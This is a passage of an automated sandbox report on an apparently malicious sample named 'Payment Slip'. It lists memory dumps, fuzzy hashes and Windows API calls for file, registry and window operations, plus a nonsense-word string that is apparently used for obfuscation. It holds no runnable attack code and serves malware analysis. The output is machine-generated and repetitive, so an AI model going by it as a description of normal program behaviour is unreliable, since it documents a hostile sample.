                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                              • Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
                                              • Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                              • Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                              • Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
                                              • Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                              • Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                              • Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
                                              • Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                              • Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                              • Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
                                              • Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                              • Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                              • Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
                                              • Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                              • Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                              • Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
                                              • Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                              • Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44
                                              APIs
                                              • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB
                                              Strings
                                              • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00405BDA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                                              • API String ID: 2738559852-2559241417
                                              • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                              • Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
                                              • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                              • Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9
                                              APIs
                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                              • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                              • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                              • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                              APIs
                                                • Part of subcall function 00402C42: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
                                              • RegCloseKey.ADVAPI32(00000000), ref: 004022FB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: CloseDeleteOpenValue
                                              • String ID:
                                              • API String ID: 849931509-0
                                              • Opcode ID: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
                                              • Instruction ID: 6cfe575b1e931931ae6cf9a5ddb5ae5b21c85a020fc8f89310b59cc06b76a7bd
                                              • Opcode Fuzzy Hash: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
                                              • Instruction Fuzzy Hash: E4F0AF72A04210ABEB01AFA18A8EAAE73689B14314F60043BF501B71C0C9BC5D02862A
                                              APIs
                                              • OleInitialize.OLE32(00000000), ref: 00405275
                                                • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004052C1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: InitializeMessageSendUninitialize
                                              • String ID:
                                              • API String ID: 2896919175-0
                                              • Opcode ID: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
                                              • Instruction ID: 554e103746b9e2db7aaf45f87dc76b5a043826cfff103a1ab0517efa01412f9c
                                              • Opcode Fuzzy Hash: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
                                              • Instruction Fuzzy Hash: 8FF090B6645600EBF62157549D05B677364EFE0300F1948BEEE44B22A1D7794C428F6D
                                              APIs
                                              • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                              • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: Window$EnableShow
                                              • String ID:
                                              • API String ID: 1136574915-0
                                              • Opcode ID: 5d4edafec38fd2beb48ef5d0e9a47d4925bced023b06079ab6e9292498eaacb4
                                              • Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
                                              • Opcode Fuzzy Hash: 5d4edafec38fd2beb48ef5d0e9a47d4925bced023b06079ab6e9292498eaacb4
                                              • Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: File$AttributesCreate
                                              • String ID:
                                              • API String ID: 415043291-0
                                              • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                              • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                              • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                              • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                              • Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
                                              • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                              • Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6
                                              APIs
                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
                                              • Instruction ID: 9dcfef7e452db0a7b9eae0ecc372c740654949990ed8f849d8faaf285a661dbe
                                              • Opcode Fuzzy Hash: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
                                              • Instruction Fuzzy Hash: 8BD012B2708100D7DB10DFA59A0899D77749B15325F700977E101F21D0D2B895519A2A
                                              APIs
                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
